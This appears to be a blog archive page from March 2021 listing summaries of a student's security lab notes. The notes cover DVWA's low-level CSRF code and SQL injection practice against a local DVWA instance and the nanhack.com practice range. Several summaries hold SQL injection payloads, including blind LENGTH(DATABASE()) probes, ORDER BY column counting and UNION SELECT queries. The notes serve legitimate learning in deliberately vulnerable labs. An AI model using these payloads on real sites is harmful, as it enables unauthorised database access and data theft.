03 2021 档案

摘要:low级别源码 分析:如果Change非空(被点击),password_new和password_conf值一致,那么新密码用md5加密后更新到数据库。 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 阅读全文
posted @ 2021-03-17 17:16 codeace 阅读(21) 评论(0) 推荐(0)
摘要:盲注 猜数据库长度 http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit# User ID exists in the database. 得出databa 阅读全文
posted @ 2021-03-16 18:29 codeace 阅读(55) 评论(0) 推荐(0)
摘要:SQL Injection-low-level-字符型 1.判断SQL语句的列数(方法一) http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=3' order by 2--+&Submit=Submit# #--> correct http://127.0 阅读全文
posted @ 2021-03-16 10:19 codeace 阅读(65) 评论(0) 推荐(0)
摘要:#查询表名-去重查询 #TABLE_NAME #users #guestbook SELECT DISTINCT TABLE_NAME FROM COLUMNS WHERE TABLE_SCHEMA = 'dvwa' ; #查询表名-分组 #group_concat(distinct TABLE_N 阅读全文
posted @ 2021-03-15 18:17 codeace
摘要:ASCII码表 | ASCII值 | 控制字符 | ASCII值 | 控制字符 | ASCII值 | 控制字符 | ASCII值 | 控制字符 | | : | : | : | : | : | : | : | : | | 0 | NUT | 32 | (space) | 64 | @ | 96 | 、 阅读全文
posted @ 2021-03-14 14:19 codeace 阅读(53) 评论(0) 推荐(0)
摘要:字符型SQL注入笔记-男黑客靶场 男黑客靶场:http://www.nanhack.com 猜测列数 输入如下能得到结果 http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8--+ 输入如下无法 阅读全文
posted @ 2021-03-13 13:06 codeace
摘要:数字型 特点:不需要单引号闭合 例如数字型语句:select * from table where id =2 1-添加单引号 正常 http://www.nanhack.com/payload/sql/number.php?id=2 异常 http://www.nanhack.com/payloa 阅读全文
posted @ 2021-03-12 17:29 codeace